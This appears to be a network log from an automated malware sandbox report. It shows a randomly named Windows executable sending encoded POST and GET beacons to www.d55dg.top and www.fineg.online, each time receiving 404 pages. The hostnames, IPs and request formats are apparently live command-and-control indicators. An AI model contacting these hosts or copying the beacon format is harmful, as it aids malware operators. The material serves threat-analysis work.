                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BmSSCfYyrXAQXCvKDaMn9G8o+iA59Aa/UfAUw7tGh2XKeJGRHBJ/9eiBti8TEraEqgFxVAcialyk+Y9lOoLqUA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:17:42.375399113 CEST927INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzIwNzdmNjctMjYzYS00NTIzLWIxMWMtMDhhNTFkMDUzYTI1IiwicGFnZV90aW1lIjoxNzI1MDAyMj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.549718154.23.184.240805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:47.709398985 CEST712OUTPOST /ftud/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.d55dg.top
                              Origin: http://www.d55dg.top
                              Referer: http://www.d55dg.top/ftud/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 72 52 6b 74 5a 30 55 30 6c 71 76 69 62 35 46 6a 72 74 44 63 39 4a 45 4d 38 76 54 63 67 62 39 34 7a 76 52 5a 71 6e 42 4a 37 76 38 77 67 78 2f 42 6c 4b 63 32 54 70 76 71 56 36 52 31 34 47 35 55 4f 71 44 79 33 70 72 53 59 6a 54 66 54 4f 33 6d 5a 4e 51 6b 38 77 63 45 58 71 75 4b 37 73 34 52 5a 52 30 44 7a 41 45 55 52 75 41 76 45 52 59 66 44 5a 30 66 30 62 34 34 4a 6f 58 72 4b 30 6d 73 31 6d 46 75 69 38 6a 48 31 46 57 4b 48 5a 45 6b 54 6f 6b 72 59 2b 6d 61 41 67 57 38 68 6c 56 38 6b 6c 2f 65 5a 74 2f 4d 33 43 6a 45 33 74 66 4c 77 58 4c 4c 5a 65 57 2f 31 64 41 3d
                              Data Ascii: KxdLgNi=PSOowArgf8yorRktZ0U0lqvib5FjrtDc9JEM8vTcgb94zvRZqnBJ7v8wgx/BlKc2TpvqV6R14G5UOqDy3prSYjTfTO3mZNQk8wcEXquK7s4RZR0DzAEURuAvERYfDZ0f0b44JoXrK0ms1mFui8jH1FWKHZEkTokrY+maAgW8hlV8kl/eZt/M3CjE3tfLwXLLZeW/1dA=
                              Aug 30, 2024 09:17:48.609348059 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:17:48 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "668fe68e-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.549719154.23.184.240805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:50.254865885 CEST732OUTPOST /ftud/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.d55dg.top
                              Origin: http://www.d55dg.top
                              Referer: http://www.d55dg.top/ftud/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 74 34 79 4f 68 5a 72 6a 74 4a 34 76 38 77 76 52 2f 45 68 4b 63 70 54 70 7a 69 56 2f 70 31 34 43 70 55 4f 72 7a 79 69 4f 48 56 65 6a 54 42 4b 2b 33 6b 61 39 51 6b 38 77 63 45 58 75 2b 67 37 73 67 52 5a 42 45 44 78 6b 59 58 63 4f 41 75 44 52 59 66 56 70 30 62 30 62 34 4b 4a 70 4b 4f 4b 32 75 73 31 6a 68 75 7a 49 33 47 2f 46 57 49 4a 35 46 37 66 34 52 41 59 73 69 46 49 41 65 38 34 58 5a 2f 6c 54 53 30 44 50 33 6b 6b 69 50 38 6e 2b 58 38 68 6e 71 69 44 39 47 50 72 4b 57 66 6c 51 45 53 37 48 38 52 39 5a 4b 78 6f 44 63 41 37 66 6a 61
                              Data Ascii: KxdLgNi=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgut4yOhZrjtJ4v8wvR/EhKcpTpziV/p14CpUOrzyiOHVejTBK+3ka9Qk8wcEXu+g7sgRZBEDxkYXcOAuDRYfVp0b0b4KJpKOK2us1jhuzI3G/FWIJ5F7f4RAYsiFIAe84XZ/lTS0DP3kkiP8n+X8hnqiD9GPrKWflQES7H8R9ZKxoDcA7fja
                              Aug 30, 2024 09:17:51.162482023 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:17:51 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "668fe68e-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.549721154.23.184.240805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:52.801175117 CEST1749OUTPOST /ftud/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.d55dg.top
                              Origin: http://www.d55dg.top
                              Referer: http://www.d55dg.top/ftud/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 6c 34 79 34 31 5a 71 45 35 4a 35 76 38 77 69 78 2f 46 68 4b 63 6b 54 70 72 59 56 2f 74 44 34 45 31 55 42 70 37 79 6d 50 48 56 4c 54 54 42 58 4f 33 6c 5a 4e 51 31 38 77 4d 41 58 71 61 67 37 73 67 52 5a 43 63 44 69 51 45 58 65 4f 41 76 45 52 59 70 44 5a 31 38 30 62 77 61 4a 70 4f 77 4a 46 32 73 37 6a 78 75 78 62 66 47 39 6c 57 4f 45 5a 46 7a 66 34 4e 66 59 74 4f 42 49 44 44 5a 34 55 35 2f 70 31 2f 56 57 39 66 49 35 79 4f 52 31 4d 44 4a 38 6e 69 67 4e 37 57 41 73 4a 36 2b 34 44 4d 6a 36 77 49 48 78 39 33 76 72 56 35 62 7a 70 4b 73 2b 34 64 6f 54 5a 4d 31 75 70 75 55 32 4c 66 49 4c 51 31 36 38 4a 32 6b 4b 55 75 32 7a 66 39 77 52 79 36 49 55 64 49 65 45 55 56 74 79 68 6b 44 55 4d 6f 2f 53 6a 4d 6b 68 6e 54 61 69 48 46 79 72 6e 37 49 47 4a 54 7a 6b 55 4e 50 30 55 76 43 43 50 4a 37 59 34 32 7a 41 46 4c 71 46 74 42 74 77 6d 6d 72 52 46 4f 47 36 38 56 30 4f 79 [TRUNCATED]
                              Data Ascii: KxdLgNi=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgul4y41ZqE5J5v8wix/FhKckTprYV/tD4E1UBp7ymPHVLTTBXO3lZNQ18wMAXqag7sgRZCcDiQEXeOAvERYpDZ180bwaJpOwJF2s7jxuxbfG9lWOEZFzf4NfYtOBIDDZ4U5/p1/VW9fI5yOR1MDJ8nigN7WAsJ6+4DMj6wIHx93vrV5bzpKs+4doTZM1upuU2LfILQ168J2kKUu2zf9wRy6IUdIeEUVtyhkDUMo/SjMkhnTaiHFyrn7IGJTzkUNP0UvCCPJ7Y42zAFLqFtBtwmmrRFOG68V0Oyb/+vuuJ0c8fH4uC28dyHiubxZ5qz7H0kPSkxOEOylEhhesg0M0PGEsIbwpNrC7AsallKnKDh3vVEBlWgeXRU9yjpQ9yUAvRjAazLxLW8LX/CW0X2EPqY0sW3zY78U5FAKp3VwOOKfmNc+UY+UisVOfbQh5iXmSF1JbSpkSpYc1iIEzNGr3vDfZVjKEBEM5kSSDUw9HvwZ/0fwFj94uiYutIJVm8T6uUmLfNum1gCLEGM90JZLD9C7By3wj76MSYPWuN6YhOC4tsPeri++OmvTwqucrJKfkvywXTks3tGyB8hbDoMVUB5WDHpvbMX5badY/yP7lgtBTvD/aCoCeTGIl0od8XXpHYurFKCheZpP2lLED0gz620auG6JF8HcXnScU3mkNOBSyXpq5FjQMmUYLRWbbNmIpXzQterUX8QFsDCoqHXub0n2Xv1btSR5xEXReJc+4WGPXHZOUGwsA2bfLBxJRU2dWJRxNodfXJbBYdfbaDuzsBilwabtMWAr99kBwS504g65IDFNC2+kMitAM/xHYKq+hlcLGDCJuX2pcmy7xdGgRZPjGakM9tz3wXv7cAtfjzvlztOw2vyKd/WgGqrNOaqYtYnCRLCKcQlSaCcl5I67FQH7qWt5ons8g7PjjhyUUEHf7wI+D2giAcZ+FiZW0hWRpp/mA [TRUNCATED]
                              Aug 30, 2024 09:17:53.688385010 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:17:53 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "668fe68e-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.549722154.23.184.240805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:55.344477892 CEST455OUTGET /ftud/?KxdLgNi=CQmIz2bNYdnQtzE5dRZx19O+RKFjtfDUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bAk6hJ8rVDO8n3CpjeInC2PpnYB4d910sD/0oMC4edJRzog==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.d55dg.top
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:17:56.252789974 CEST302INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:17:56 GMT
                              Content-Type: text/html
                              Content-Length: 138
                              Connection: close
                              ETag: "668fe68e-8a"
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.549727162.0.239.141805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:14.653378010 CEST721OUTPOST /mkan/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.fineg.online
                              Origin: http://www.fineg.online
                              Referer: http://www.fineg.online/mkan/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 71 79 38 4f 6b 42 52 35 77 6a 31 34 4f 54 4f 57 57 4b 4d 34 50 76 42 44 73 37 67 68 63 6f 6d 77 68 45 43 6f 4a 39 44 39 30 48 43 57 66 50 41 49 72 2b 64 41 45 6a 6b 4e 64 35 64 64 65 61 4b 44 35 70 43 32 2f 51 42 2b 67 77 42 78 71 61 73 69 39 6b 4d 64 59 71 35 55 47 35 44 32 6b 71 6e 61 76 44 34 6a 57 33 76 6f 67 32 33 72 59 6f 7a 50 35 34 65 50 65 6b 58 35 4d 6f 63 68 6a 4c 43 2f 53 42 4d 49 57 4a 51 78 41 35 6c 32 78 54 47 4f 66 59 4a 36 41 70 54 43 2b 49 75 38 50 76 53 64 71 48 77 79 4d 32 2b 4d 62 33 69 45 42 74 6c 35 6e 74 43 45 43 6a 62 50 4f 73 73 3d
                              Data Ascii: KxdLgNi=z8pzi1wICkJUqy8OkBR5wj14OTOWWKM4PvBDs7ghcomwhECoJ9D90HCWfPAIr+dAEjkNd5ddeaKD5pC2/QB+gwBxqasi9kMdYq5UG5D2kqnavD4jW3vog23rYozP54ePekX5MochjLC/SBMIWJQxA5l2xTGOfYJ6ApTC+Iu8PvSdqHwyM2+Mb3iEBtl5ntCECjbPOss=
                              Aug 30, 2024 09:18:15.238581896 CEST1236INHTTP/1.1 404 Not Found
                              Date: Fri, 30 Aug 2024 07:18:15 GMT
                              Server: Apache
                              Content-Length: 18121
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                              Aug 30, 2024 09:18:15.238603115 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                              Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                              Aug 30, 2024 09:18:15.238615990 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                              Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                              Aug 30, 2024 09:18:15.238678932 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                              Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                              Aug 30, 2024 09:18:15.238689899 CEST1236INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                              Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                              Aug 30, 2024 09:18:15.238701105 CEST1236INData Raw: 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63
                              Data Ascii: -6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.2h3z"/> <pa
                              Aug 30, 2024 09:18:15.238713026 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                              Data Ascii: /> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-6.8 25.2h3z"/>
                              Aug 30, 2024 09:18:15.238727093 CEST1236INData Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                              Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 2
                              Aug 30, 2024 09:18:15.238738060 CEST1236INData Raw: 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                              Data Ascii: 0 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M460 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8
                              Aug 30, 2024 09:18:15.238749027 CEST556INData Raw: 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 30 20 32 38 32 2e 34
                              Data Ascii: class="st2" d="M250 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M240 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="
                              Aug 30, 2024 09:18:15.243633986 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                              Data Ascii: > <path class="st2" d="M150 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M140 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M130 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M120 282.4h-3l-6.8 25.2h3z"/> <path c


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.549728162.0.239.141805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:17.292551994 CEST741OUTPOST /mkan/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.fineg.online
                              Origin: http://www.fineg.online
                              Referer: http://www.fineg.online/mkan/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
